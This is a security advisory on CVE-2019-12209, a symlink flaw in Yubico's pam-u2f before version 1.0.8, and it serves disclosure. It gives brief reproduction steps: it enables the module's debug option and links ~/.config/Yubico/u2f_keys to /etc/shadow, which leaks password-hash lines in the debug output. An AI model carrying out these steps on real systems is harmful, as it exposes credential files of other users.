ASA-2019-00322 – pam-u2f: Symlink attack on u2f_keys leading to possible information leak


Allele Security Alert

ASA-2019-00322

Identifier(s)

ASA-2019-00322, CVE-2019-12209

Title

Symlink attack on u2f_keys leading to possible information leak

Vendor(s)

Yubico

Product(s)

pam-u2f

Affected version(s)

pam-u2f versions before 1.0.8

Fixed version(s)

pam-u2f version 1.0.8

Proof of concept

Unknown

Description

The PAM module follows the file `$HOME/.config/Yubico/u2f_keys` blindly, so it can be a symlink pointing to an arbitrary file. The module only rejects non-regular files and files owned by users other than root or the user being authenticated. Even these checks are made only after the file has been open()'ed, which may already trigger kernel logic that is otherwise not reachable by regular users.

Technical details

If the PAM module's `debug` option is also enabled, most of the content of the file is written to stdout, stderr, syslog or the defined debug file. This makes the issue an information leak that can expose the contents of e.g. /etc/shadow, /root/.bash_history or similar sensitive files. Furthermore, the symlink attack can be used to bring other users' u2f_keys files into the authentication process.

For example, use the following line in the PAM stack:

```
auth optional pam_u2f.so debug
```

Then prepare a suitable symlink:

```
user$ mkdir -p ~/.config/Yubico
user$ ln -s /etc/shadow ~/.config/Yubico/u2f_keys
```

Then authenticate the user on a text console:

```
host login: user
Password: XXX
[...]
debug(pam_u2f): Authorization line: avahi:!:18019::::::
[...]
```

Notice the lines from /etc/shadow being output on the terminal.

Credits

Matthias Gerstner (SUSE Security Team)

Reference(s)

pam-u2f: CVE-2019-12210: debug_file file descriptor leak, CVE-2019-12209: symlink attack on u2f_keys leading to possible information leak
https://seclists.org/oss-sec/2019/q2/149

Drop privileges by default when opening user-related files
https://github.com/Yubico/pam-u2f/commit/7db3386fcdb454e33a3ea30dcfb8e8960d4c3aa3

Release Notes
https://developers.yubico.com/pam-u2f/Release_Notes.html

pam-u2f
https://developers.yubico.com/pam-u2f/

CVE-2019-12209
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12209

CVE-2019-12209
https://nvd.nist.gov/vuln/detail/CVE-2019-12209


Last modified: June 8, 2019
